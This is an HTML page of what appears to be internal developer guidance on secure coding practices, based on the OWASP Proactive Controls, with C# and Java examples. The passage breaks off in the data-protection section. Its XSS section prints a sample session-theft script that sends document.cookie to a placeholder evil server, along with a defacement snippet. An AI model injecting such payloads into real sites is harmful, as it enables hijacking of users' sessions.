<html lang="en">
<head>
    <meta charset="utf-8">
    <title>Sphera Developer Guidance</title>
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta content="" name="keywords">
    <meta content="" name="description">
  
    <!-- Favicons -->
    <link href="/img/favicon.png" rel="icon">
    <link href="/img/apple-touch-icon.png" rel="apple-touch-icon">
  
    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,700,700i|Montserrat:300,400,500,700" rel="stylesheet">
  
    <!-- Bootstrap CSS File -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
  
    <!-- Libraries CSS Files -->
    <link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/4.5.6/css/ionicons.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/owl-carousel/1.3.3/owl.carousel.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/lightbox2/2.11.1/css/lightbox.min.css" rel="stylesheet">
  
    <!-- Main Stylesheet File -->
    <link href="/css/style.css" rel="stylesheet">
    <style>
        img {
            max-width: 100%;
            height: auto;
            display: block;
            margin: auto;
        }
        #logo img {
            display: inline-block;
        }
        #about h1, #about h2, #about h3, #about h4, #about h5, #about h6 {
            text-transform: uppercase;
            font-weight: 500;
            position: relative;
            padding-bottom: 15px;
            padding-top: 20px;
        }
        #about h1 {
            font-weight: 700;
        }
        #about h2::before, #about h3::before,#about h4::before,#about h5::before,#about h6::before {
            content: '';
            position: absolute;
            display: block;
            width: 120px;
            height: 1px;
            background: #ddd;
            bottom: 1px;
        }
        #about h2::after{
            content: '';
            position: absolute;
            display: block;
            width: 60px;
            height: 3px;
            background: #009bde;
            bottom: 0;
        }
        #about h3::after, #about h4::after, #about h5::after, #about h6::after {
            content: '';
            position: absolute;
            display: block;
            width: 30px;
            height: 3px;
            background: #009bde;
            bottom: 0;
        }
        h1[id],
        h2[id],
        h3[id],
        h4[id],
        h5[id],
        h6[id] {
            position: relative;
        }
        .heading-anchor-permalink {
            /* Position the permalink to the left of the title */
            position: absolute;
            right: 100%;
            /* Add some spacing as padding to not lose the hover */
            padding-right: 0.6rem;
            /* Make it only visible on heading hover, see below */
            opacity: 0;
        }
        h1[id]:hover .heading-anchor-permalink,
        h2[id]:hover .heading-anchor-permalink,
        h3[id]:hover .heading-anchor-permalink,
        h4[id]:hover .heading-anchor-permalink,
        h5[id]:hover .heading-anchor-permalink,
        h6[id]:hover .heading-anchor-permalink {
            opacity: 0.5;
        }
        blockquote {
            padding-left: 30px;
        }
        table {
            border-spacing: 0;
            margin-bottom: 1.5rem;
        }

        table th,
        table td {
            padding: 0.3em 0.7em;
        }

        table th {
            background-color: #f4f4f4;
            border: 1px solid lightgray;
            border-bottom: 2px solid #444;
        }

        table td {
            border: 1px solid lightgray;
            font-size: smaller;
        }
        @media (min-width: 1024px){
            .nav-menu-container {
                padding-right: 60px;
            }
        }
        .nav-menu-container {
            float: right;
            margin: 0;
        }
        #menu {
            padding: 0 8px 10px 8px;
            text-decoration: none;
            display: inline-block;
            color: #fff;
            font-family: "Montserrat", sans-serif;
            font-weight: 700;
            font-size: 13px;
            text-transform: uppercase;
            outline: none;
            padding-top: 4px;
        }
        pre {
          padding: 20px;
          padding-left: 30px;
        }
    </style>
  </head>
  
  <body>
      <button type="button" id="mobile-nav-toggle">
          <i class="fa fa-bars"></i>
      </button>
  
    <!--==========================
      Header
    ============================-->
    <header id="header" class="header-scrolled">
      <div class="container-fluid">
  
        <div id="logo" class="pull-left">
          <!-- <h1><a href="#intro" class="scrollto">Sphera Developer Documentation</a></h1> -->
          <!-- Uncomment below if you prefer to use an image logo -->
          <a href="#intro">
              <img src="/img/sphera-logo-white-transparent.png" alt="" title="">
            </a>
          <span id="title"><h3>DevDocs</h3></span>
        </div>
        <nav id="nav-menu-container">
          <ul class="nav-menu sf-js-enabled sf-arrows" style="touch-action: pan-y;">
            <li ><a href="/index.html">Home</a></li>
            <li id="menu" class="menu-has-children"><a href="" class="sf-with-ul">Documents</a><!--NAV--></li>
            <li><a href="https://platform-api-dev.portal.azure-api.net/docs/services/">API Portfolio</a></li>
          </ul> 
            
        </nav><!-- #nav-menu-container -->
      </div>
    </header><!-- #header -->
    <!--==========================
      Intro Section
    ============================-->
    <section id="intro">
      <div class="intro-container">
        <div id="introCarousel" class="carousel  slide carousel-fade" data-ride="carousel">
  
          <ol class="carousel-indicators">
              <li data-target="#introCarousel" data-slide-to="0" class="active"></li>
         </ol>
  
          <div class="carousel-inner" role="listbox">
  
            <div class="carousel-item active" style="background-image: url('/img/intro-carousel/1.jpg');">
              <div class="carousel-container">
                <div class="carousel-content">
                  <h2>SpheraCloud Services Guidance</h2>
                  <h3>Guidance and Best Practices Guides for our world class API's</h3>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section><!-- #intro -->
  
    <main id="main">
  
      <!--==========================
        About Us Section
      ============================-->
      <section id="about">
        <div class="container">
  
          
                <div id="layout">
                        
                        <article id="main" class="content">
                            <div class="row">
                                <div class="txt-article txt-article-header">
                                    <h1>Sphera Securing Coding Guidance</h1>
                                   <h2> 
                                      <i>​​<b>​Security is never optional</b> for developers</i></h2>
                                </div>
                             </div>
                             <div class="row">
                                <div class="col-1"> 
                                   <br/>&#160;
                                </div>&#160;
                             </div>
                             <div class="row">
                                <div class="txt-article">
                                   <p>As cybersecurity risks steadily increase, application security has become an absolute necessity. That means secure coding practices must be part of every developer’s skill set. How you write code, and the steps you take to update and monitor it, have a big impact on your applications, your  organization, and your ability to do your job well. </p>
                                   <p>This guide will give you practical tips in using secure coding best practices. It’s based on the OWASP Top 10 Proactive Controls — widely considered the gold standard for application security — but translated into a concise, easy-to-use format. You’ll get a brief overview of each control, along with coding examples, actionable advice, and further resources to help you create secure software.</p>
                                   <p>As you dive in to this section, it is best to keep in mind that the actions I recommend are not against &quot;imaginary&quot; threats. These threats are very real and these vulnerabilities are found in a surprising number of websites and commercial products. Below, take a look at what WhitehatSecurity has found in the wild. </p>
                                   <br/>
                                   <img class="img-article" alt="secure code" src="./img/whitehat-vulnerability-profiles.png" data-themekey="#"/>
                                </div>
                             </div>
                             <div class="row">
                                <div class="col-1"> 
                                   <br/>&#160;</div>&#160;</div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id"> 1</div>
                                      <h2> Verify for Security Early and Often</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>It used to be standard practice for the security team to do security testing near the end of a project and then hand the results over to developers for remediation. But tackling a laundry list of fixes just before the application is scheduled to go to production isn’t acceptable anymore. It also increases the risk of a breach. You need the tools and processes for manual and automated testing during coding. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Consider the OWASP Application Security Verification Standard as a guide to define security requirements and generate test cases</li>
                                         <li>Scrum with the security team to ensure testing methods fix any defects</li>
                                         <li>Add a security champion to each development team. A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don’t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization’s security experts to provide guidance.</li>
                                         <li>Consider data protections from the beginning. Include security up front when agreeing upon the definition of “done” for a project</li>
                                         <li>Integrate security testing in continuous integration to create fast, automated feedback loops</li>
                                      </ul>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" target="_blank">OWASP Application Security Verification Standard Project</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/OWASP_Testing_Project" target="_blank">OWASP Testing Guide</a></li>
                                         <li> 
                                            <a href="https://www.checkmarx.com/resources/white-papers/" target="_blank">Checkmarx Whitepaper collection</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">2</div>
                                      <h2>Parameterize Queries</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorised data. </p>
                                      <p>SQL injection is one of the most dangerous application risks, partly because attackers can use open source attack tools to exploit these common vulnerabilities. You can control this risk using query parameterization. This type of query specifies placeholders for parameters, so the database will always treat them as data, rather than part of a SQL command. You can use prepared statements, and a growing number of frameworks, including Rails, Django, and Node.js, use object relational mappers to abstract communication with a database. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>All input should be validated against a whitelist of acceptable value ranges.</li>
                                         <li>Parameterize the queries by binding the variables.</li>
                                         <li>Be cautious about allowing user input into object queries (OQL/HQL) or other advanced queries supported by the framework.</li>
                                         <li>Defend against SQL injection using proper database management system configuration - Principle of Least Privilege.</li>
                                      </ul>
                                      <hr/>
                                      <h3>THOUGHTS</h3>
                                      <p>Sql Injection, although not as common as Cross-Site-Scripting, poses a significantly higher risk because any compromise here can open up more than just the current user session. With Sql Injection attacks, hi-jacked data and can be stored at the database level to compromise EVERY user of the system. </p>
                                      <p>
                                      </p>
                                      <hr/>
                                      <h3>EXAMPLES</h3>
                                      <p>Here is an example of query parametization in C#:</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 0px; line-height: 125%;">                  
<span style="color: #a7a7a7; font-weight: bold;">string</span> sql = <span style="color: #cd5555;">&quot;SELECT * FROM Customers WHERE CustomerId = @CustomerId&quot;</span>;
SqlCommand command = <span style="color: #8b008b; font-weight: bold;">new</span> SqlCommand(sql);
command.Parameters.Add(<span style="color: #8b008b; font-weight: bold;">new</span> SqlParameter(<span style="color: #cd5555;">&quot;@CustomerId&quot;</span>, System.Data.SqlDbType.Int));
command.Parameters[<span style="color: #cd5555;">&quot;@CustomerId&quot;</span>].Value = <span style="color: #b452cd;">1</span>;
                                        </pre>
                                      </div>
                                      <p>Here is an example of query parameterization in Java:</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 0px; line-height: 125%;">
String newName = request.<span style="color: #658b00;">getParameter</span>(<span style="color: #cd5555;">&quot;newName&quot;</span>);
<span style="color: #a7a7a7; font-weight: bold;">int</span> id = Integer.<span style="color: #658b00;">parseInt</span>(request.<span style="color: #658b00;">getParameter</span>(<span style="color: #cd5555;">&quot;id&quot;</span>));
PreparedStatement pstmt = con.<span style="color: #658b00;">prepareStatement</span>(<span style="color: #cd5555;">&quot;UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?&quot;</span>);
pstmt.<span style="color: #658b00;">setString</span>(<span style="color: #b452cd;">1</span>, newName);
pstmt.<span style="color: #658b00;">setInt</span>(<span style="color: #b452cd;">2</span>, id);
                          </pre>
                                      </div>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" target="_blank">OWASP Query Parameterization Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.veracode.com/blog/intro-appsec/sql-injection-attacks-and-how-prevent-them-infographic" target="_blank">SQL Injection Attacks and How to Prevent Them Infographic</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id"> 3</div>
                                      <h2>Encode Data</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</p>
                                      <p>Encoding translates potentially dangerous special characters into an equivalent form that renders the threat ineffective. This technique is applicable for a variety of platforms and injection methods, including UNIX command encoding, Windows command encoding, and cross-site scripting (XSS). Encoding addresses the three main classes of XSS: persistent, reflected, and DOM-based </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li> 
                                            <b>Treat all data as untrusted</b>, including dynamic content consisting of a mix of static, developer-built HTML/JavaScript, and data that was originally populated with user input</li>
                                         <li>Always use request validation, unless there is an approved reason to have it turned off.  For example, unless explicitly turned off, all ASP.NET web apps will look for potentially malicious input and throw an HTTP 500 error if detected.</li>
                                         <li>Develop relevant encoding (whitelisting inputs) to address the spectrum of attack methods, including injection attacks. In .NET the HtmlEncode functionality and the AntiXSS libraries are a great starting point.</li>
                                         <li>Use output encoding, such as JavaScript hex encoding and HTML entity encoding. </li>
                                         <li>Monitor how dynamic webpage development occurs, and consider how JavaScript and HTML populate user input, along with the risks of untrusted sources.</li>
                                      </ul>
                                      <hr/>
                                      <h3>THOUGHTS</h3>
                                      <p>This category includes some of the most common attacks that can be found in the wild - including Cross-Site-Scripting (XSS).  Cross-site-scripting is where things begin to get really interesting, starting with the fact that it’s by far and away the most 
                                         <b>commonly exploited vulnerability</b> out there today. Recently, WhiteHat Security delivered their Website Security Statistics Report and found a staggering 65% of websites with XSS vulnerabilities, that’s four times as many as the SQL injection vulnerability we just looked at in number 
                                         <b>2</b>.</p>
                                      <p>One of the best descriptions I’ve heard of XSS was on one of the OWASP podcasts where it was described it as 
                                         <i>“breaking out of a data context and entering a code context”</i>. So think of it as a vulnerable system expecting a particular field to be passive data when in fact it carries a functional payload which actively causes an event to occur. The event is normally a request for the browser to perform an activity outside the intended scope of the web application. In the context of security, this will often be an event with malicious intent.</p>
                                      <hr/>
                                      <h3>EXAMPLES - Cross Site Scripting</h3>
                                      <p>This is a common example of a common XSS site defacement</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 0px; line-height: 125%;">                  
<span style="color: #8b008b; font-weight: bold;">&lt;script&gt;</span>
    <span style="color: #658b00;">document</span>.body.innerHTML(<span style="color: #cd5555;">&quot;Jerry was here&quot;</span>);
<span style="color: #8b008b; font-weight: bold;">&lt;/script&gt;</span>
                          </pre>
                                      </div>
                                      <p>Example XSS session theft</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 0px; line-height: 125%;">                  
<span style="color: #8b008b; font-weight: bold;">&lt;script&gt;</span>
    <span style="color: #8b008b; font-weight: bold;">var</span> img = <span style="color: #8b008b; font-weight: bold;">new</span> Image();
    img.src=<span style="color: #cd5555;">&quot;http://&lt;some evil server&gt;.com?&quot;</span> + <span style="color: #658b00;">document</span>.cookie;
<span style="color: #8b008b; font-weight: bold;">&lt;/script&gt;</span>
                          </pre>
                                      </div>
                                      <p>The good news is that despite how common these attacks are, they are relativly easy to defend against.  Most languages provide a built-in mechansim to support html encoding for inputs - and they should 
                                         <b>ALWAYS</b> be used.</p>
                                      <p>If you happen to be using a Microsoft .NET, by default, MVC rejects requests containing HTML markup to prevent Cross-Site Scripting attacks and this is one advantage of MVC since if you forgot to work on XSS preventions then you still win; however, do NOT rely on this as your sole means of protection.</p>
                                      <br/>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 20px; line-height: 125%;">                  
<span style="color: #228b22;">// input encoding sample</span>
<span style="color: #a7a7a7; font-weight: bold;">var</span> newUrl = Request.QueryString[<span style="color: #cd5555;">&quot;Url&quot;</span>]; 
<span style="color: #8b008b; font-weight: bold;">if</span> (!Uri.IsWellFormedUriString(newUrl, UriKind.Absolute)) 
{
    log.warning(<span style="color: #cd5555;">&quot;An invalid URL has been specified.&quot;</span>);   
    <span style="color: #8b008b; font-weight: bold;">return</span>;
}
...
                          
<span style="color: #228b22;">// output encoding sample</span>
<span style="color: #a7a7a7; font-weight: bold;">var</span> name = AntiXss.JavaScriptEncode(txtName.Text, <span style="color: #8b008b; font-weight: bold;">false</span>); 
<span style="color: #a7a7a7; font-weight: bold;">var</span> message = <span style="color: #cd5555;">&quot;Thank you &quot;</span> + name; 
<span style="color: #a7a7a7; font-weight: bold;">var</span> alertScript = <span style="color: #cd5555;">&quot;&lt;script&gt;alert(&#39;&quot;</span> + message + <span style="color: #cd5555;">&quot;&#39;);&lt;/script&gt;&quot;</span>; 
ClientScript.RegisterClientScriptBlock(GetType(), <span style="color: #cd5555;">&quot;ThankYou&quot;</span>, alertScript); 
                          </pre>
                                      </div>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank">OWASP XSS Filter Evasion Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" target="_blank">OWASP DOM based XSS Prevention Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://docs.microsoft.com/en-us/dotnet/api/system.web.httpserverutility.htmlencode?view=netframework-4.7.2" target="_blank">HTMLEncode for.NET framework</a></li>
                                         <li> 
                                            <a href="https://docs.microsoft.com/en-us/dotnet/api/system.web.security.antixss.antixssencoder?view=netframework-4.7.2" target="_blank">Microsoft AntiXss Library</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">4</div>
                                      <h2>Validate ALL Inputs</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>It&#39;s vitally important to ensure that all data is syntactically and semantically valid as it arrives and enters a system. As you approach the task, assume that all data and variables can’t be trusted, and provide security controls regardless of the source of that data. Valid syntax means that the data is in the form that&#39;s expected — including the correct number of characters or digits. Semantic validity means that the data has actual meaning and is valid for the interaction or transaction. Whitelisting is the recommended validation method. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Assume that all incoming data is untrusted. </li>
                                         <li>Develop whitelists for checking syntax. For example, regular expressions are a great way to implement whitelist validation, as they offer a way to check whether data matches a specific pattern. </li>
                                         <li>Make sure input validation takes place exclusively on the server side. This extends across multiple components, including HTTP headers, cookies, GET and POST parameters (including hidden fields), and file uploads. It also encompasses user devices and back-end web services.</li>
                                         <li>Use client-side controls only as a convenience or for notifying users. It should not be relied on as a hijacker could easily bypass browser or client based security and send their own input to the server. </li>
                                      </ul>
                                      <hr/>
                                      <h3>THOUGHTS</h3>
                                      <p>You&#39;ll notice that this item, Input Validation, also appears as parts of the other standards for security.  This is an example of Defense-In-Depth.  No single method provides 100% safety; however, combined, they can lower the risk significantly.</p>
                                      <hr/>
                                      <h3>EXAMPLES - Validating Common Types with Regular Expressions</h3>
                                      <p>Here are some basic validations based on Regular Expressions that you could use:</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 20px; line-height: 125%;">                  
<span style="color: #a7a7a7; font-weight: bold;">var</span> firstname = Request.QueryString[<span style="color: #cd5555;">&quot;firstname&quot;</span>];
                          
<span style="color: #a7a7a7; font-weight: bold;">var</span> positiveRealNumberGreaterThanZeroRegex = <span style="color: #8b008b; font-weight: bold;">new</span> Regex(<span style="color: #cd5555;">@&quot;^[0-9]*[1-9]+[0-9]*\.[0-9]*$)|(^[0-9]*\.[0-9]*[1-9]+[0-9]*$)|(^[0-9]*[1-9]+[0-9]*$)&quot;</span>); 
<span style="color: #a7a7a7; font-weight: bold;">var</span> properNameRegex = <span style="color: #8b008b; font-weight: bold;">new</span> Regex(<span style="color: #cd5555;">@&quot;^([a-zA-Z]{2,}\s[a-zA-z]{1,}&#39;?-?[a-zA-Z]{2,}\s?([a-zA-Z]{1,})?)&quot;</span>);
<span style="color: #a7a7a7; font-weight: bold;">var</span> zipcodeRegex = <span style="color: #8b008b; font-weight: bold;">new</span> Regex(<span style="color: #cd5555;">@&quot;[0-9]\{5\}(-[0-9]\{4\})?&quot;</span>);
<span style="color: #a7a7a7; font-weight: bold;">var</span> emailRegex = <span style="color: #8b008b; font-weight: bold;">new</span> Regex(<span style="color: #cd5555;">@&quot;/^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$&quot;</span>);
<span style="color: #a7a7a7; font-weight: bold;">var</span> emailRegex = <span style="color: #8b008b; font-weight: bold;">new</span> Regex(<span style="color: #cd5555;">@&quot;/^([\w-\.]+@(?!sphera.com)([\w- ]+\.)+[\w-]{2,4})?$/&quot;</span>);
                          
<span style="color: #228b22;">// if the supplied values are not in the whitelist, reject the query immediately</span>
<span style="color: #8b008b; font-weight: bold;">if</span>(!emailRegex.IsMatch(email))
{   
    log.warning(<span style="color: #cd5555;">&quot;An invalid or non-golub email has been specified.&quot;</span>);   
    <span style="color: #8b008b; font-weight: bold;">return</span>; 
}
                          </pre>
                                      </div>
                                      <br/>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" target="_blank">OWASP Application Security Verification Standard Project</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/OWASP_Testing_Project" target="_blank">OWASP Testing Guide</a></li>
                                         <li> 
                                            <a href="http://regexlib.com/?AspxAutoDetectCookieSupport=1" target="_blank">Regular Expression Library</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">5</div>
                                      <h2>Implement Identity and Authentication Controls</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>You can avoid security breaches by confirming user identity up front and building strong authentication controls into code and systems. These controls must extend beyond a basic username and password. You’ll want to include both session management and identity management controls to provide the highest level of protection. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Use strong authentication methods, including multi-factor authentication,  such as FIDO, dedicated apps, or Windows Authentication.</li>
                                         <li>Implement secure password requirements and storage - never store passwords in plain text, even if the database is encrypted. 
                                            <i>Not really applicable when using Windows Auth.</i></li>
                                         <li>Implement a secure password recovery mechanism to help users gain access to their account if they forget their password.  Enable password recovery via resets - never email it. Doing password recovery wrong is a recipe for disaster; it could literally serve up credentials to an attacker on a silver platter. 
                                            <i>Not really applicable when using Windows Auth.</i></li>
                                         <li>Ensure that all back-end services support only authenticated requests.</li>
                                         <li>Establish explicit timeout and inactivity periods for every session.</li>
                                         <li>Use re-authentication for sensitive or highly secure features.</li>
                                         <li>Use only secure session management.</li>
                                         <li>Use monitoring and analytics to spot suspicious IP addresses and machine IDs.</li>
                                         <li>Consider biometric authentication methods, such as fingerprint, facial recognition, and voice recognition, to verify the identity of users.<sup>*</sup> </li>
                                      </ul>
                                      <hr/>
                                      <h3>THOUGHTS</h3>
                                      <p>Your users are entering their password into your website or application. They are trusting you with their security. If your database gets hacked, and your users&#39; passwords are unprotected, then malicious hackers can use those passwords to compromise your users&#39; accounts on other websites and services (most people use the same password everywhere). It&#39;s not just your security that&#39;s at risk, it&#39;s your users&#39;. You are responsible for your users&#39; security.</p>
                                      <hr/>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" target="_blank">OWASP Authentication Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" target="_blank">OWASP Password Storage Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" target="_blank">OWASP Session Management Cheat Sheet</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">6</div>
                                      <h2>Implement Access Controls</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>You can dramatically improve protection and resiliency in your applications by building authorization or access controls into your applications in the initial stages of application development. Note that authorization is not the same as authentication. According to OWASP, authorization is the “process where requests to access a particular feature or resource should be granted or denied.”  When appropriate, authorization should include a multi-tenancy and horizontal (data specific) access control. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Use a security-centric design, where access is verified first. Consider using a filter or other automated mechanism to ensure that all requests go through an access control check.</li>
                                         <li>Consider denying all access for features that haven’t been configured for access control.</li>
                                         <li>Code to the principle of least privilege. Allocate the minimum privilege and time span required to perform an action for each user or system component.</li>
                                         <li>Separate access control policy and application code, whenever possible.</li>
                                         <li>Consider checking if the user has access to a feature in code, as opposed to checking the user&#39;s role.</li>
                                         <li>Adopt a framework that supports server-side trusted data for driving access control. Key elements of the framework include user identity and log-in state, user entitlements, overall access control policy, the feature and data requested, along with time and geolocation.</li>
                                      </ul>
                                      <hr/>
                                      <h3>THOUGHTS</h3>
                                      <p>Here, my recommendation diverges from the OWASP standard.  In the OWASP standard, they recommend preferring access checks be done at the individual rather than the role of AD group level. In theory, they are correct; however, in practice, this approach becomes extremely unwieldy very quickly and requires complex and nearly real-time updates to code or your Authentication provider to support this behavior. </p>
                                      <hr/>
                                      <h3>EXAMPLES - Coding to Activity</h3>
                                      <p>Here are some examples using the [Authorize] attribute in C# with WebAPI.</p>
                                      <div style="background: #ffffff; border-width: 0.1em 0.1em 0.1em 0.8em; border-style: solid; border-color: gray; padding: 0.2em 0.6em; width: auto; overflow: auto;">
                                         <pre style="margin: 20px; line-height: 125%;">                  
<span style="color: #8b008b; font-weight: bold;">public</span> <span style="color: #8b008b; font-weight: bold;">static</span> <span style="color: #8b008b; font-weight: bold;">void</span> <span style="color: #008b45;">Register</span>(HttpConfiguration config)
{
    config.Filters.Add(<span style="color: #8b008b; font-weight: bold;">new</span> AuthorizeAttribute());
}
                          
<span style="color: #228b22;">// Require authorization for all actions on the controller.</span>
<span style="color: #658b00;">[Authorize]</span>
<span style="color: #8b008b; font-weight: bold;">public</span> <span style="color: #8b008b; font-weight: bold;">class</span> <span style="color: #008b45; font-weight: bold;">ValuesController</span> : ApiController
{
    <span style="color: #8b008b; font-weight: bold;">public</span> HttpResponseMessage <span style="color: #008b45;">Get</span>(<span style="color: #a7a7a7; font-weight: bold;">int</span> id) { ... }
    <span style="color: #8b008b; font-weight: bold;">public</span> HttpResponseMessage <span style="color: #008b45;">Post</span>() { ... }
}
                          
<span style="color: #228b22;">// authorizing only a specific action</span>
<span style="color: #8b008b; font-weight: bold;">public</span> <span style="color: #8b008b; font-weight: bold;">class</span> <span style="color: #008b45; font-weight: bold;">ValuesController</span> : ApiController
{
    <span style="color: #8b008b; font-weight: bold;">public</span> HttpResponseMessage <span style="color: #008b45;">Get</span>() { ... }
                          
    <span style="color: #228b22;">// Require authorization for a specific action.</span>
    <span style="color: #658b00;">[Authorize]</span>
    <span style="color: #8b008b; font-weight: bold;">public</span> HttpResponseMessage <span style="color: #008b45;">Post</span>() { ... }
}
                          
<span style="color: #228b22;">// Restrict by user:</span>
<span style="color: #658b00;">[Authorize(Users=&quot;Alice,Bob&quot;)]</span>
<span style="color: #8b008b; font-weight: bold;">public</span> <span style="color: #8b008b; font-weight: bold;">class</span> <span style="color: #008b45; font-weight: bold;">ValuesController</span> : ApiController
{
    ...
}
                          
<span style="color: #228b22;">// Restrict by role:</span>
<span style="color: #658b00;">[Authorize(Roles=&quot;Administrators&quot;)]</span>
<span style="color: #8b008b; font-weight: bold;">public</span> <span style="color: #8b008b; font-weight: bold;">class</span> <span style="color: #008b45; font-weight: bold;">ValuesController</span> : ApiController
{
    ...
}
                          </pre>
                                      </div>
                                      <br/>
                                      <hr/>
                                      <h3>ADDITIONAL RESOURCES</h3>
                                      <ul>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" target="_blank">OWASP Access Control Cheat Sheet</a></li>
                                         <li> 
                                            <a href="https://www.owasp.org/index.php/Testing_for_Authorization" target="_blank">OWASP Testing Guide for Authorization</a></li>
                                         <li> 
                                            <a href="https://www.veracode.com/security/spoofing-attack" target="_blank">Veracode Guide to Spoofing Attacks</a></li>
                                      </ul>
                                   </div>
                                </div>
                             </div>
                             <div class="row">
                                <div class="best-practices-block txt-article">
                                   <div class="bp-header">
                                      <div class="id">7</div>
                                      <h2>Protect Data</h2>
                                   </div>
                                   <div class="bp-body">
                                      <p>Organizations have a duty to protect sensitive data within applications. To that end, you must encrypt critical data while it’s at rest and in transit. This includes financial transactions, web data, browser data, and information residing in mobile apps. Regulations like the EU General Data Protection Regulation make data protection a serious compliance issue. </p>
                                      <hr/>
                                      <h3>GUIDANCE</h3>
                                      <ul class="checkItem">
                                         <li>Don’t be tempted to implement your own homegrown libraries. Use security-focused, peer-reviewed, and open source libraries, including the Google KeyCzar project, Bouncy Castle, and the functions included in SDKs. Most modern languages have implemented crypto-libraries and modules, so choose one based on your application’s language. </li>
